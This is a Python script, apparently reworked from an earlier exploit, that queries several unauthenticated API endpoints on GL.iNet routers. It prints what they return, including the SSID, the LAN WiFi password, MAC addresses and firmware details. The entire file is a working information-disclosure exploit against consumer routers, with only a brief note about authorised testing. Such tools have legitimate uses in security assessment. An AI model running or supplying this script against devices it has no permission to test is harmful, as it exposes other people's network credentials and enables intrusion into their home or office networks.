#!/usr/bin/env python3
#########################################################
#
# Usage: python3 scanner.py <domain/IP>
#
# Example: python3 scanner.py 192.168.8.1
#
# This script scans a GL.iNet router for information that
# is exposed to an unauthenticated user. It first tries
# plain HTTP and falls back to HTTPS (with certificate
# verification disabled) if the HTTP attempt fails.
# Several API endpoints are queried and all returned data
# is merged and printed to the screen. Note that the output
# can include the LAN WiFi password (see "key" below), so
# treat it as sensitive and only run this against devices
# you are authorized to test.
#
# Output explained:
# - del: ?
# - led: ? Something about LED lights
# - led_sync: ? Something about LED lights
# - disabled: which channel (2G or 5G or neither) is disabled
# - wifi_sync: ?
# - ssid: SSID of LAN WiFi network
# - key: WiFi password for LAN network
# - encryption: LAN WiFi encryption type
# - version: GL.iNET firmware version
# - code: 0
# - model: GL.iNET model name
# - factory_mac: MAC address given by GL.iNET
# - init: If device has been setup
# - connected: If device is connected to the internet
# - configured: If device has been configured
# - firmware_user: ?
# - firmware_type: ?
# - mac: current MAC address (may be changed from factory_mac)
# - type: device type
# - name: name of the device
# - hostname: hostname of the device
# - image_url: path to custom customer logo
# - customer_name: name of the customer
# - help_url: path to custom customer help page
# - internal_version: internal version number
# - language: 2-character language code
#
#########################################################
import requests, sys
import warnings
warnings.filterwarnings("ignore")
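## Scanner
DEFAULT_TIMEOUT = 4  # seconds per request; the original used 4 everywhere

# Unauthenticated endpoints queried, in the original order:
# (method, path, form-encoded body or None). Results are merged with
# dict.update(), so a later endpoint overrides an earlier one on key clashes.
ENDPOINTS = (
    ("POST", "/api/router/mesh/status", "mac="),
    ("GET", "/api/router/nologin/apinfo", None),
    ("GET", "/api/router/hello", None),
    ("GET", "/api/router/model", None),
    ("GET", "/api/router/language/get", None),
)


def normalize_target(target: str) -> "tuple[str, str | None]":
    """Split the CLI target into (host, scheme).

    ``scheme`` is "http" or "https" when the user spelled it out (the
    original accepted only a bare host and would have built
    "http://https://..."), otherwise None so the caller probes for it.
    Surrounding whitespace and trailing slashes are dropped so the path
    concatenation below stays well formed.
    """
    target = target.strip()
    scheme = None
    lowered = target.lower()
    for prefix in ("http://", "https://"):
        if lowered.startswith(prefix):
            scheme = prefix[:-len("://")]
            target = target[len(prefix):]
            break
    return target.rstrip("/"), scheme


def base_url(host: str, https: bool) -> str:
    """Return the scheme+host prefix that every API path is appended to."""
    return ("https://" if https else "http://") + host


def probe_target(host: str, timeout: float = DEFAULT_TIMEOUT) -> bool:
    """Find out whether the router answers on HTTP or HTTPS.

    Plain HTTP is tried first; HTTPS only if that raised a transport error.
    Returns True when the API calls should use HTTPS, False for HTTP.
    Raises requests.RequestException when neither scheme is reachable.
    """
    print("[+] Scanning http://" + host + "/...")
    try:
        landing = requests.request("GET", "http://" + host + "/", timeout=timeout)
    except requests.RequestException as exc:
        print("[-] Error connecting to target: " + str(exc))
        print("[-] Attempting HTTPS...")
    else:
        # requests follows redirects, so a router that bounced the HTTP probe
        # to HTTPS is advertising HTTPS; use it for the API calls too rather
        # than going back to plain HTTP as the original did.
        return landing.url.lower().startswith("https://")
    print("[+] Scanning https://" + host + "/...")
    # verify=False is carried over from the original, presumably because the
    # router's certificate does not validate against the system CA bundle.
    # Caveat for reuse: this leaves the connection unauthenticated, so an
    # on-path attacker could feed the scanner fabricated results.
    requests.request("GET", "https://" + host + "/", verify=False, timeout=timeout)
    return True


def query_endpoint(base: str, method: str, path: str, data: "str | None" = None,
                   timeout: float = DEFAULT_TIMEOUT) -> dict:
    """Call one API endpoint and return its JSON object ({} on any failure).

    Best-effort on purpose: an endpoint missing from a given firmware, a
    timeout, or a non-JSON reply just contributes nothing, but the failure is
    reported instead of silently swallowed (the original used a bare
    ``except``, which also ate KeyboardInterrupt). Only transport errors and
    JSON decoding errors are caught. Non-object JSON (e.g. a list) is
    discarded because it cannot be merged into the result dict.
    """
    headers = None
    if data is not None:
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    try:
        response = requests.request(method, base + path, verify=False,
                                    timeout=timeout, data=data, headers=headers)
        payload = response.json()
    except (requests.RequestException, ValueError) as exc:
        # ValueError covers json.JSONDecodeError; newer requests raise its own
        # JSONDecodeError, which is both a RequestException and a ValueError.
        print("[-] " + path + ": " + type(exc).__name__)
        return {}
    if not isinstance(payload, dict):
        print("[-] " + path + ": unexpected JSON type " + type(payload).__name__)
        return {}
    return payload


def merge_results(payloads) -> dict:
    """Fold endpoint payloads into one dict; later payloads win on key clashes.

    Anything that is not a dict is skipped rather than raising.
    """
    merged = {}
    for payload in payloads:
        if isinstance(payload, dict):
            merged.update(payload)
    return merged


def scan(base: str, timeout: float = DEFAULT_TIMEOUT) -> dict:
    """Query every endpoint in ENDPOINTS against ``base`` and merge the results."""
    return merge_results(query_endpoint(base, method, path, data, timeout)
                         for method, path, data in ENDPOINTS)


def format_results(output: dict) -> "list[str]":
    """Render the merged results as one " key: value" line each (original layout)."""
    return [" " + str(key) + ": " + str(value) for key, value in output.items()]


def main(argv: "list | None" = None) -> None:
    """CLI entry point: argv[0] is the target host, optionally with a scheme.

    Exits with status 1 on missing argument or when the target is unreachable.
    """
    args = sys.argv[1:] if argv is None else argv
    if len(args) < 1:
        # Name the script as it was actually invoked; the original said
        # "exploit.py" although the file is scanner.py.
        print("Usage: python3 " + (sys.argv[0] or "scanner.py") + " <domain/IP>")
        sys.exit(1)
    host, scheme = normalize_target(args[0])
    if not host:
        print("[-] Empty target")
        sys.exit(1)
    if scheme is None:
        try:
            https = probe_target(host)
        except requests.RequestException as exc:
            print("[-] Error connecting to target: " + str(exc))
            sys.exit(1)
    else:
        https = scheme == "https"
        print("[+] Scanning " + scheme + "://" + host + "/...")
    results = scan(base_url(host, https))
    print("[+] Scan complete. Results:")
    for line in format_results(results):
        print(line)


if __name__ == "__main__":
    main()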